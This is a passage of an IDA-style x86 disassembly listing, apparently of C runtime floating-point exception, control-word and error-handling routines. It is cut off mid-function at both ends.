loc_41009E:				; CODE XREF: sub_40FE06+26Ej
					; sub_40FE06+276j ...
		mov	eax, [ecx]
		shr	eax, 2
		and	eax, 7
		sub	eax, ebx
		jz	short loc_4100BF
		dec	eax
		jz	short loc_4100B4
		dec	eax
		jnz	short loc_4100CA
		and	[esi], edx
		jmp	short loc_4100CA
; ---------------------------------------------------------------------------

loc_4100B4:				; CODE XREF: sub_40FE06+2A5j
		mov	eax, [esi]
		and	eax, edx
		or	eax, 200h
		jmp	short loc_4100C8
; ---------------------------------------------------------------------------

loc_4100BF:				; CODE XREF: sub_40FE06+2A2j
		mov	eax, [esi]
		and	eax, edx
		or	eax, 300h

loc_4100C8:				; CODE XREF: sub_40FE06+2B7j
		mov	[esi], eax

loc_4100CA:				; CODE XREF: sub_40FE06+2A8j
					; sub_40FE06+2ACj
		cmp	[ebp+arg_18], ebx
		jz	short loc_4100D6
		fld	dword ptr [ecx+50h]
		fstp	dword ptr [edi]
		jmp	short loc_4100DB
; ---------------------------------------------------------------------------

loc_4100D6:				; CODE XREF: sub_40FE06+2C7j
		fld	qword ptr [ecx+50h]
		fstp	qword ptr [edi]

loc_4100DB:				; CODE XREF: sub_40FE06+2CEj
		pop	edi
		pop	esi
		pop	ebx
		pop	ebp
		retn
sub_40FE06	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4100E0	proc near		; CODE XREF: sub_410407+21p

var_28		= qword	ptr -28h
var_10		= qword	ptr -10h
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		xor	ebx, ebx
		mov	esi, eax
		and	esi, 1Fh
		inc	ebx
		test	al, 8
		mov	[ebp+var_4], esi
		jz	short loc_41010E
		test	byte ptr [ebp+arg_8], bl
		jz	short loc_41010E
		push	ebx
		call	sub_410644
		pop	ecx
		and	esi, 0FFFFFFF7h
		jmp	loc_41029F
; ---------------------------------------------------------------------------

loc_41010E:				; CODE XREF: sub_4100E0+18j
					; sub_4100E0+1Dj
		test	al, 4
		jz	short loc_410128
		test	byte ptr [ebp+arg_8], 4
		jz	short loc_410128
		push	4
		call	sub_410644
		pop	ecx
		and	esi, 0FFFFFFFBh
		jmp	loc_41029F
; ---------------------------------------------------------------------------

loc_410128:				; CODE XREF: sub_4100E0+30j
					; sub_4100E0+36j
		test	al, bl
		jz	loc_4101CA
		test	byte ptr [ebp+arg_8], 8
		jz	loc_4101CA
		push	8
		call	sub_410644
		mov	eax, [ebp+arg_8]
		pop	ecx
		mov	ecx, 0C00h
		and	eax, ecx
		jz	short loc_4101A2
		cmp	eax, 400h
		jz	short loc_41018C
		cmp	eax, 800h
		jz	short loc_410176
		cmp	eax, ecx
		jnz	short loc_4101C2
		fldz
		mov	ecx, [ebp+arg_4]
		fcomp	qword ptr [ecx]
		fnstsw	ax
		fld	dbl_4250C8
		test	ah, 5
		jnp	short loc_4101C0
		jmp	short loc_4101BE
; ---------------------------------------------------------------------------

loc_410176:				; CODE XREF: sub_4100E0+7Aj
		fldz
		mov	ecx, [ebp+arg_4]
		fcomp	qword ptr [ecx]
		fnstsw	ax
		test	ah, 5
		jnp	short loc_4101B0
		fld	dbl_4250C8
		jmp	short loc_4101BE
; ---------------------------------------------------------------------------

loc_41018C:				; CODE XREF: sub_4100E0+73j
		fldz
		mov	ecx, [ebp+arg_4]
		fcomp	qword ptr [ecx]
		fnstsw	ax
		test	ah, 5
		jp	short loc_4101B8
		fld	dbl_4250C8
		jmp	short loc_4101C0
; ---------------------------------------------------------------------------

loc_4101A2:				; CODE XREF: sub_4100E0+6Cj
		fldz
		mov	ecx, [ebp+arg_4]
		fcomp	qword ptr [ecx]
		fnstsw	ax
		test	ah, 5
		jp	short loc_4101B8

loc_4101B0:				; CODE XREF: sub_4100E0+A2j
		fld	dbl_4250B8
		jmp	short loc_4101C0
; ---------------------------------------------------------------------------

loc_4101B8:				; CODE XREF: sub_4100E0+B8j
					; sub_4100E0+CEj
		fld	dbl_4250B8

loc_4101BE:				; CODE XREF: sub_4100E0+94j
					; sub_4100E0+AAj
		fchs

loc_4101C0:				; CODE XREF: sub_4100E0+92j
					; sub_4100E0+C0j ...
		fstp	qword ptr [ecx]

loc_4101C2:				; CODE XREF: sub_4100E0+7Ej
		and	esi, 0FFFFFFFEh
		jmp	loc_41029F
; ---------------------------------------------------------------------------

loc_4101CA:				; CODE XREF: sub_4100E0+4Aj
					; sub_4100E0+54j
		test	al, 2
		jz	loc_41029F
		test	byte ptr [ebp+arg_8], 10h
		jz	loc_41029F
		xor	esi, esi
		test	al, 10h
		jz	short loc_4101E4
		mov	esi, ebx

loc_4101E4:				; CODE XREF: sub_4100E0+100j
		fldz
		push	edi
		mov	edi, [ebp+arg_4]
		fcomp	qword ptr [edi]
		fnstsw	ax
		test	ah, 44h
		jnp	loc_410289
		fld	qword ptr [edi]
		lea	eax, [ebp+var_8]
		push	eax		; int
		push	ecx
		push	ecx		; double
		fstp	[esp+28h+var_28]
		call	sub_410557
		mov	ecx, [ebp+var_8]
		fstp	[ebp+var_10]
		add	ecx, 0FFFFFA00h
		add	esp, 0Ch
		cmp	ecx, 0FFFFFBCEh
		jge	short loc_41022B
		fld	[ebp+var_10]
		mov	esi, ebx
		fmul	ds:dbl_41FE38
		jmp	short loc_41027F
; ---------------------------------------------------------------------------

loc_41022B:				; CODE XREF: sub_4100E0+13Cj
		fldz
		fcomp	[ebp+var_10]
		fnstsw	ax
		test	ah, 41h
		jnz	short loc_41023B
		mov	edx, ebx
		jmp	short loc_41023D
; ---------------------------------------------------------------------------

loc_41023B:				; CODE XREF: sub_4100E0+155j
		xor	edx, edx

loc_41023D:				; CODE XREF: sub_4100E0+159j
		movzx	eax, byte ptr [ebp+var_10+6]
		and	eax, 0Fh
		or	eax, 10h
		mov	word ptr [ebp+var_10+6], ax
		mov	eax, 0FFFFFC03h
		cmp	ecx, eax
		jge	short loc_410276
		sub	eax, ecx

loc_410256:				; CODE XREF: sub_4100E0+194j
		test	byte ptr [ebp+var_10], bl
		jz	short loc_410261
		test	esi, esi
		jnz	short loc_410261
		mov	esi, ebx

loc_410261:				; CODE XREF: sub_4100E0+179j
					; sub_4100E0+17Dj
		shr	dword ptr [ebp+var_10],	1
		test	byte ptr [ebp+var_10+4], bl
		jz	short loc_410270
		or	dword ptr [ebp+var_10],	80000000h

loc_410270:				; CODE XREF: sub_4100E0+187j
		shr	dword ptr [ebp+var_10+4], 1
		dec	eax
		jnz	short loc_410256

loc_410276:				; CODE XREF: sub_4100E0+172j
		test	edx, edx
		jz	short loc_410282
		fld	[ebp+var_10]
		fchs

loc_41027F:				; CODE XREF: sub_4100E0+149j
		fstp	[ebp+var_10]

loc_410282:				; CODE XREF: sub_4100E0+198j
		fld	[ebp+var_10]
		fstp	qword ptr [edi]
		jmp	short loc_41028B
; ---------------------------------------------------------------------------

loc_410289:				; CODE XREF: sub_4100E0+111j
		mov	esi, ebx

loc_41028B:				; CODE XREF: sub_4100E0+1A7j
		test	esi, esi
		pop	edi
		jz	short loc_410298
		push	10h
		call	sub_410644
		pop	ecx

loc_410298:				; CODE XREF: sub_4100E0+1AEj
		and	[ebp+var_4], 0FFFFFFFDh
		mov	esi, [ebp+var_4]

loc_41029F:				; CODE XREF: sub_4100E0+29j
					; sub_4100E0+43j ...
		test	byte ptr [ebp+arg_0], 10h
		jz	short loc_4102B6
		test	byte ptr [ebp+arg_8], 20h
		jz	short loc_4102B6
		push	20h
		call	sub_410644
		pop	ecx
		and	esi, 0FFFFFFEFh

loc_4102B6:				; CODE XREF: sub_4100E0+1C3j
					; sub_4100E0+1C9j
		xor	eax, eax
		test	esi, esi
		pop	esi
		setz	al
		pop	ebx
		leave
		retn
sub_4100E0	endp


; =============== S U B	R O U T	I N E =======================================



sub_4102C1	proc near		; CODE XREF: sub_410316+6Cp
					; sub_410316+91p ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		cmp	eax, 1
		jz	short loc_4102DD
		jle	short locret_4102E8
		cmp	eax, 3
		jg	short locret_4102E8
		call	sub_405D93
		mov	dword ptr [eax], 22h
		retn
; ---------------------------------------------------------------------------

loc_4102DD:				; CODE XREF: sub_4102C1+7j
		call	sub_405D93
		mov	dword ptr [eax], 21h

locret_4102E8:				; CODE XREF: sub_4102C1+9j
					; sub_4102C1+Ej
		retn
sub_4102C1	endp


; =============== S U B	R O U T	I N E =======================================



sub_4102E9	proc near		; CODE XREF: sub_410407+55p

arg_0		= byte ptr  4

		mov	al, [esp+arg_0]
		test	al, 20h
		jz	short loc_4102F5
		push	5
		jmp	short loc_41030B
; ---------------------------------------------------------------------------

loc_4102F5:				; CODE XREF: sub_4102E9+6j
		test	al, 8
		jz	short loc_4102FD
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------

loc_4102FD:				; CODE XREF: sub_4102E9+Ej
		test	al, 4
		jz	short loc_410305
		push	2
		jmp	short loc_41030B
; ---------------------------------------------------------------------------

loc_410305:				; CODE XREF: sub_4102E9+16j
		test	al, 1
		jz	short loc_41030D
		push	3

loc_41030B:				; CODE XREF: sub_4102E9+Aj
					; sub_4102E9+1Aj
		pop	eax
		retn
; ---------------------------------------------------------------------------

loc_41030D:				; CODE XREF: sub_4102E9+1Ej
		movzx	eax, al
		and	eax, 2
		add	eax, eax
		retn
sub_4102E9	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

; int __cdecl sub_410316(int,int,int,int,int,int,double,int)

sub_410316	proc near		; CODE XREF: sub_4103B4+2Ap
					; sub_410407+87p

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= qword	ptr -8
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= qword	ptr  20h
arg_20		= dword	ptr  28h

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		xor	eax, eax

loc_41031E:				; CODE XREF: sub_410316+18j
		mov	ecx, dword_424FD0[eax*8]
		cmp	ecx, [ebp+arg_4]
		jz	short loc_41038E
		inc	eax
		cmp	eax, 1Dh
		jl	short loc_41031E
		xor	eax, eax

loc_410332:				; CODE XREF: sub_410316+7Fj
		test	eax, eax
		mov	[ebp+var_1C], eax
		jz	short loc_410397
		mov	eax, [ebp+arg_8]
		mov	[ebp+var_18], eax
		mov	eax, [ebp+arg_C]
		mov	[ebp+var_14], eax
		mov	eax, [ebp+arg_10]
		mov	[ebp+var_10], eax
		mov	eax, [ebp+arg_14]
		push	esi
		mov	esi, [ebp+arg_0]
		mov	[ebp+var_C], eax
		mov	eax, dword ptr [ebp+arg_18]
		mov	dword ptr [ebp+var_8], eax
		mov	eax, dword ptr [ebp+arg_18+4]
		push	0FFFFh
		push	[ebp+arg_20]
		mov	[ebp+var_20], esi
		mov	dword ptr [ebp+var_8+4], eax
		call	sub_41061D
		lea	eax, [ebp+var_20]
		push	eax
		call	sub_40FCC8
		add	esp, 0Ch
		test	eax, eax
		jnz	short loc_410388
		push	esi
		call	sub_4102C1
		pop	ecx

loc_410388:				; CODE XREF: sub_410316+69j
		fld	[ebp+var_8]
		pop	esi
		leave
		retn
; ---------------------------------------------------------------------------

loc_41038E:				; CODE XREF: sub_410316+12j
		mov	eax, off_424FD4[eax*8]
		jmp	short loc_410332
; ---------------------------------------------------------------------------

loc_410397:				; CODE XREF: sub_410316+21j
		push	0FFFFh
		push	[ebp+arg_20]
		call	sub_41061D
		push	[ebp+arg_0]
		call	sub_4102C1
		fld	[ebp+arg_18]
		add	esp, 0Ch
		leave
		retn
sub_410316	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

; int __cdecl sub_4103B4(int,double,int)

sub_4103B4	proc near		; CODE XREF: sub_40AF03+51p

var_1C		= qword	ptr -1Ch
var_14		= qword	ptr -14h
var_C		= qword	ptr -0Ch
arg_0		= dword	ptr  8
arg_4		= qword	ptr  0Ch
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		cmp	dword_424FC0, 0
		jnz	short loc_4103E8
		push	[ebp+arg_C]	; int
		fld	[ebp+arg_4]
		sub	esp, 18h
		fstp	[esp+1Ch+var_C]
		fldz
		fstp	[esp+1Ch+var_14]
		fld	[ebp+arg_4]
		fstp	[esp+1Ch+var_1C]
		push	[ebp+arg_0]	; int
		push	1		; int
		call	sub_410316
		add	esp, 24h
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_4103E8:				; CODE XREF: sub_4103B4+Aj
		call	sub_405D93
		push	0FFFFh
		push	[ebp+arg_C]
		mov	dword ptr [eax], 21h
		call	sub_41061D
		fld	[ebp+arg_4]
		pop	ecx
		pop	ecx
		pop	ebp
		retn
sub_4103B4	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

; int __cdecl sub_410407(int,int,double,double,int)

sub_410407	proc near		; CODE XREF: sub_40AF03:loc_40AFC8p

var_9C		= qword	ptr -9Ch
var_94		= qword	ptr -94h
var_8C		= qword	ptr -8Ch
var_84		= dword	ptr -84h
var_80		= byte ptr -80h
var_40		= dword	ptr -40h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= qword	ptr  10h
arg_10		= qword	ptr  18h
arg_18		= dword	ptr  20h

		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF0h
		sub	esp, 80h
		mov	eax, dword_424064
		xor	eax, esp
		mov	[esp+80h+var_4], eax
		push	[ebp+arg_18]
		lea	eax, [ebp+arg_10]
		push	eax
		push	[ebp+arg_0]
		call	sub_4100E0
		add	esp, 0Ch
		test	eax, eax
		jnz	short loc_410459
		and	[esp+80h+var_40], 0FFFFFFFEh
		push	eax
		lea	eax, [ebp+arg_10]
		push	eax
		lea	eax, [ebp+arg_8]
		push	eax
		push	[ebp+arg_4]
		lea	eax, [ebp+arg_18]
		push	[ebp+arg_0]
		push	eax
		lea	eax, [esp+98h+var_80]
		push	eax
		call	sub_40FE06
		add	esp, 1Ch

loc_410459:				; CODE XREF: sub_410407+2Bj
		push	[ebp+arg_0]
		call	sub_4102E9
		add	esp, 4
		cmp	dword_424FC0, 0
		jnz	short loc_410498
		test	eax, eax
		jz	short loc_410498
		push	[ebp+arg_18]	; int
		fld	[ebp+arg_10]
		sub	esp, 18h
		fstp	[esp+9Ch+var_8C]
		fldz
		fstp	[esp+9Ch+var_94]
		fld	[ebp+arg_8]
		fstp	[esp+9Ch+var_9C]
		push	[ebp+arg_4]	; int
		push	eax		; int
		call	sub_410316
		add	esp, 24h
		jmp	short loc_4104B2
; ---------------------------------------------------------------------------

loc_410498:				; CODE XREF: sub_410407+64j
					; sub_410407+68j
		push	eax
		call	sub_4102C1
		mov	[esp+84h+var_84], 0FFFFh
		push	[ebp+arg_18]
		call	sub_41061D
		fld	[ebp+arg_10]
		pop	ecx
		pop	ecx

loc_4104B2:				; CODE XREF: sub_410407+8Fj
		mov	ecx, [esp+80h+var_4]
		xor	ecx, esp
		call	sub_402C9E
		mov	esp, ebp
		pop	ebp
		retn
sub_410407	endp


; =============== S U B	R O U T	I N E =======================================


; int __cdecl sub_4104C1(double)

sub_4104C1	proc near		; CODE XREF: sub_40AF03:loc_40AF89p

var_8		= qword	ptr -8
arg_0		= qword	ptr  4

		push	ecx
		push	ecx
		fld	[esp+8+arg_0]
		frndint
		fstp	[esp+8+var_8]
		fld	[esp+8+var_8]
		pop	ecx
		pop	ecx
		retn
sub_4104C1	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

; int __cdecl sub_4104D2(double,int)

sub_4104D2	proc near		; CODE XREF: sub_410557+79p
					; sub_410557+8Ep

var_8		= qword	ptr -8
arg_0		= qword	ptr  8
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		mov	eax, [ebp+arg_8]
		fld	[ebp+arg_0]
		mov	ecx, dword ptr [ebp+arg_0+6]
		fstp	[ebp+var_8]
		add	eax, 3FEh
		shl	eax, 4
		and	ecx, 0FFFF800Fh
		or	eax, ecx
		mov	word ptr [ebp+var_8+6],	ax
		fld	[ebp+var_8]
		leave
		retn
sub_4104D2	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4104FC	proc near		; CODE XREF: sub_40AF03+31p

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		xor	edx, edx
		cmp	[ebp+arg_4], 7FF00000h
		jnz	short loc_410514
		cmp	[ebp+arg_0], edx
		jnz	short loc_410527
		xor	eax, eax
		inc	eax
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_410514:				; CODE XREF: sub_4104FC+Cj
		cmp	[ebp+arg_4], 0FFF00000h
		jnz	short loc_410527
		cmp	[ebp+arg_0], edx
		jnz	short loc_410527
		push	2

loc_410524:				; CODE XREF: sub_4104FC+3Cj
					; sub_4104FC+55j
		pop	eax
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_410527:				; CODE XREF: sub_4104FC+11j
					; sub_4104FC+1Fj ...
		mov	ecx, [ebp+arg_4+2]
		mov	eax, 7FF8h
		and	ecx, eax
		cmp	cx, ax
		jnz	short loc_41053A
		push	3
		jmp	short loc_410524
; ---------------------------------------------------------------------------

loc_41053A:				; CODE XREF: sub_4104FC+38j
		cmp	cx, 7FF0h
		jnz	short loc_410553
		test	[ebp+arg_4], 7FFFFh
		jnz	short loc_41054F
		cmp	[ebp+arg_0], edx
		jz	short loc_410553

loc_41054F:				; CODE XREF: sub_4104FC+4Cj
		push	4
		jmp	short loc_410524
; ---------------------------------------------------------------------------

loc_410553:				; CODE XREF: sub_4104FC+43j
					; sub_4104FC+51j
		xor	eax, eax
		pop	ebp
		retn
sub_4104FC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

; int __cdecl sub_410557(double,int)

sub_410557	proc near		; CODE XREF: sub_4100E0+122p

var_C		= qword	ptr -0Ch
arg_0		= qword	ptr  8
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		fldz
		fcom	[ebp+arg_0]
		fnstsw	ax
		test	ah, 44h
		jp	short loc_41056D
		xor	edx, edx
		jmp	loc_4105FF
; ---------------------------------------------------------------------------

loc_41056D:				; CODE XREF: sub_410557+Dj
		xor	ecx, ecx
		test	word ptr [ebp+arg_0+6],	7FF0h
		jnz	short loc_4105DA
		test	dword ptr [ebp+arg_0+4], 0FFFFFh
		jnz	short loc_410585
		cmp	dword ptr [ebp+arg_0], ecx
		jz	short loc_4105DA

loc_410585:				; CODE XREF: sub_410557+27j
		fcomp	[ebp+arg_0]
		mov	edx, 0FFFFFC03h
		fnstsw	ax
		test	ah, 41h
		jnz	short loc_410599
		xor	eax, eax
		inc	eax
		jmp	short loc_4105B1
; ---------------------------------------------------------------------------

loc_410599:				; CODE XREF: sub_410557+3Bj
		xor	eax, eax
		jmp	short loc_4105B1
; ---------------------------------------------------------------------------

loc_41059D:				; CODE XREF: sub_410557+5Ej
		shl	dword ptr [ebp+arg_0+4], 1
		test	dword ptr [ebp+arg_0], 80000000h
		jz	short loc_4105AD
		or	dword ptr [ebp+arg_0+4], 1

loc_4105AD:				; CODE XREF: sub_410557+50j
		shl	dword ptr [ebp+arg_0], 1
		dec	edx

loc_4105B1:				; CODE XREF: sub_410557+40j
					; sub_410557+44j
		test	byte ptr [ebp+arg_0+6],	10h
		jz	short loc_41059D
		and	word ptr [ebp+arg_0+6],	0FFEFh
		cmp	eax, ecx
		jz	short loc_4105C7
		or	word ptr [ebp+arg_0+6],	8000h

loc_4105C7:				; CODE XREF: sub_410557+68j
		fld	[ebp+arg_0]
		push	ecx		; int
		push	ecx
		push	ecx		; double
		fstp	[esp+0Ch+var_C]
		call	sub_4104D2
		add	esp, 0Ch
		jmp	short loc_4105FF
; ---------------------------------------------------------------------------

loc_4105DA:				; CODE XREF: sub_410557+1Ej
					; sub_410557+2Cj
		push	ecx		; int
		fstp	st
		fld	[ebp+arg_0]
		push	ecx
		push	ecx		; double
		fstp	[esp+0Ch+var_C]
		call	sub_4104D2
		mov	edx, dword ptr [ebp+arg_0+6]
		shr	edx, 4
		and	edx, 7FFh
		add	esp, 0Ch
		sub	edx, 3FEh

loc_4105FF:				; CODE XREF: sub_410557+11j
					; sub_410557+81j
		mov	eax, [ebp+arg_8]
		mov	[eax], edx
		pop	ebp
		retn
sub_410557	endp


; =============== S U B	R O U T	I N E =======================================



sub_410606	proc near		; CODE XREF: sub_40FE06+DCp

var_4		= word ptr -4

		push	ecx
		fstsw	[esp+4+var_4]
		movsx	eax, [esp+4+var_4]
		pop	ecx
		retn
sub_410606	endp


; =============== S U B	R O U T	I N E =======================================



sub_410611	proc near		; CODE XREF: sub_40FE06:loc_410019p

var_4		= word ptr -4

		push	ecx
		fnstsw	[esp+4+var_4]
		fnclex
		movsx	eax, [esp+4+var_4]
		pop	ecx
		retn
sub_410611	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41061D	proc near		; CODE XREF: sub_40AF03+13p
					; sub_40AF03+5Dp ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	ecx
		fstcw	word ptr [ebp+var_4]
		mov	eax, [ebp+arg_4]
		mov	ecx, [ebp+arg_0]
		and	ecx, [ebp+arg_4]
		not	eax
		and	eax, [ebp+var_4]
		or	eax, ecx
		movzx	eax, ax
		mov	[ebp+arg_4], eax
		fldcw	word ptr [ebp+arg_4]
		movsx	eax, word ptr [ebp+var_4]
		leave
		retn
sub_41061D	endp


; =============== S U B	R O U T	I N E =======================================



sub_410644	proc near		; CODE XREF: sub_4100E0+20p
					; sub_4100E0+3Ap ...

var_8		= qword	ptr -8
arg_0		= dword	ptr  4

		push	ecx
		push	ecx
		mov	cl, byte ptr [esp+8+arg_0]
		test	cl, 1
		jz	short loc_41065A
		fld	tbyte_4250E0
		fistp	[esp+8+arg_0]
		wait

loc_41065A:				; CODE XREF: sub_410644+9j
		test	cl, 8
		jz	short loc_41066F
		fstsw	ax
		fld	tbyte_4250E0
		fstp	[esp+8+var_8]
		wait
		fstsw	ax

loc_41066F:				; CODE XREF: sub_410644+19j
		test	cl, 10h
		jz	short loc_41067E
		fld	tbyte_4250EC
		fstp	[esp+8+var_8]
		wait

loc_41067E:				; CODE XREF: sub_410644+2Ej
		test	cl, 4
		jz	short loc_41068C
		fldz
		fld1
		fdivrp	st(1), st
		fstp	st
		wait

loc_41068C:				; CODE XREF: sub_410644+3Dj
		test	cl, 20h
		jz	short loc_410697
		fldpi
		fstp	[esp+8+var_8]
		wait

loc_410697:				; CODE XREF: sub_410644+4Bj
		pop	ecx
		pop	ecx
		retn
sub_410644	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41069A	proc near		; CODE XREF: sub_413A67+243p

ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	8
		push	offset dword_422E78
		call	__SEH_prolog4
		xor	eax, eax
		cmp	dword_4376DC, eax
		jz	short loc_410706
		test	byte ptr [ebp+arg_0], 40h
		jz	short loc_4106FE
		cmp	dword_4250F8, eax
		jz	short loc_4106FE
		mov	[ebp+ms_exc.disabled], eax
		ldmxcsr	[ebp+arg_0]
		jmp	short loc_4106F5
; ---------------------------------------------------------------------------
		mov	eax, [ebp+ms_exc.exc_ptr]
		mov	eax, [eax]
		mov	eax, [eax]
		cmp	eax, 0C0000005h
		jz	short loc_4106DF
		cmp	eax, 0C000001Dh
		jz	short loc_4106DF
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_4106DF:				; CODE XREF: sub_41069A+39j
					; sub_41069A+40j
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp+ms_exc.old_esp]
		and	dword_4250F8, 0
		and	[ebp+arg_0], 0FFFFFFBFh
		ldmxcsr	[ebp+arg_0]

loc_4106F5:				; CODE XREF: sub_41069A+2Bj
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		jmp	short loc_410706
; ---------------------------------------------------------------------------

loc_4106FE:				; CODE XREF: sub_41069A+1Aj
					; sub_41069A+22j
		and	[ebp+arg_0], 0FFFFFFBFh
		ldmxcsr	[ebp+arg_0]

loc_410706:				; CODE XREF: sub_41069A+14j
					; sub_41069A+62j
		call	__SEH_epilog4
		retn
sub_41069A	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41070C	proc near		; CODE XREF: sub_41075D+Ap

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= byte ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= byte ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	[ebp+arg_0]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		movzx	eax, [ebp+arg_4]
		mov	ecx, [ebp+var_C]
		mov	dl, [ebp+arg_C]
		test	[ecx+eax+1Dh], dl
		jnz	short loc_41074B
		cmp	[ebp+arg_8], 0
		jz	short loc_410745
		mov	ecx, [ebp+var_10]
		mov	ecx, [ecx+0C8h]
		movzx	eax, word ptr [ecx+eax*2]
		and	eax, [ebp+arg_8]
		jmp	short loc_410747
; ---------------------------------------------------------------------------

loc_410745:				; CODE XREF: sub_41070C+25j
		xor	eax, eax

loc_410747:				; CODE XREF: sub_41070C+37j
		test	eax, eax
		jz	short loc_41074E

loc_41074B:				; CODE XREF: sub_41070C+1Fj
		xor	eax, eax
		inc	eax

loc_41074E:				; CODE XREF: sub_41070C+3Dj
		cmp	[ebp+var_4], 0
		jz	short locret_41075B
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

locret_41075B:				; CODE XREF: sub_41070C+46j
		leave
		retn
sub_41070C	endp


; =============== S U B	R O U T	I N E =======================================



sub_41075D	proc near		; CODE XREF: sub_40B144+3Fp
					; sub_40B27C+53p ...

arg_0		= dword	ptr  4

		push	4
		push	0
		push	[esp+8+arg_0]
		push	0
		call	sub_41070C
		add	esp, 10h
		retn
sub_41075D	endp


; =============== S U B	R O U T	I N E =======================================



sub_410770	proc near		; CODE XREF: sub_40B6DE+56p
					; sub_40BC59+59p ...

arg_0		= dword	ptr  4

		xor	eax, eax
		inc	eax
		cmp	[esp+arg_0], 0
		jnz	short locret_41077C
		xor	eax, eax

locret_41077C:				; CODE XREF: sub_410770+8j
		retn
sub_410770	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=2A8h


sub_41077D	proc near		; CODE XREF: sub_40C419:loc_40C447p

var_328		= dword	ptr -328h
var_31C		= dword	ptr -31Ch
var_2D8		= dword	ptr -2D8h
var_2D4		= dword	ptr -2D4h
var_2D0		= dword	ptr -2D0h
var_244		= word ptr -244h
var_240		= word ptr -240h
var_23C		= word ptr -23Ch
var_238		= word ptr -238h
var_234		= dword	ptr -234h
var_230		= dword	ptr -230h
var_22C		= dword	ptr -22Ch
var_228		= dword	ptr -228h
var_224		= dword	ptr -224h
var_220		= dword	ptr -220h
var_21C		= dword	ptr -21Ch
var_218		= dword	ptr -218h
var_214		= word ptr -214h
var_210		= dword	ptr -210h
var_20C		= dword	ptr -20Ch
var_208		= word ptr -208h
var_4		= dword	ptr -4

		push	ebp
		lea	ebp, [esp-2A8h]
		sub	esp, 328h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+2A8h+var_4], eax
		test	byte_4250FC, 1
		push	esi
		jz	short loc_4107AA
		push	0Ah
		call	sub_40A074
		pop	ecx

loc_4107AA:				; CODE XREF: sub_41077D+23j
		call	sub_40E2DC
		test	eax, eax
		jz	short loc_4107BB
		push	16h
		call	sub_40E2E9
		pop	ecx

loc_4107BB:				; CODE XREF: sub_41077D+34j
		test	byte_4250FC, 2
		jz	loc_410868
		mov	[ebp+2A8h+var_220], eax
		mov	[ebp+2A8h+var_224], ecx
		mov	[ebp+2A8h+var_228], edx
		mov	[ebp+2A8h+var_22C], ebx
		mov	[ebp+2A8h+var_230], esi
		mov	[ebp+2A8h+var_234], edi
		mov	[ebp+2A8h+var_208], ss
		mov	[ebp+2A8h+var_214], cs
		mov	[ebp+2A8h+var_238], ds
		mov	[ebp+2A8h+var_23C], es
		mov	[ebp+2A8h+var_240], fs
		mov	[ebp+2A8h+var_244], gs
		pushf
		pop	[ebp+2A8h+var_210]
		mov	esi, [ebp+2ACh]
		lea	eax, [ebp+2ACh]
		mov	[ebp+2A8h+var_20C], eax
		mov	[ebp+2A8h+var_2D0], 10001h
		mov	[ebp+2A8h+var_218], esi
		mov	eax, [eax-4]
		push	50h
		mov	[ebp+2A8h+var_21C], eax
		lea	eax, [ebp+2A8h+var_328]
		push	0
		push	eax
		call	sub_408130
		lea	eax, [ebp+2A8h+var_328]
		add	esp, 0Ch
		mov	[ebp+2A8h+var_2D8], eax
		lea	eax, [ebp+2A8h+var_2D0]
		push	0
		mov	[ebp+2A8h+var_328], 40000015h
		mov	[ebp+2A8h+var_31C], esi
		mov	[ebp+2A8h+var_2D4], eax
		call	ds:dword_41E19C	; SetUnhandledExceptionFilter
		lea	eax, [ebp+2A8h+var_2D8]
		push	eax
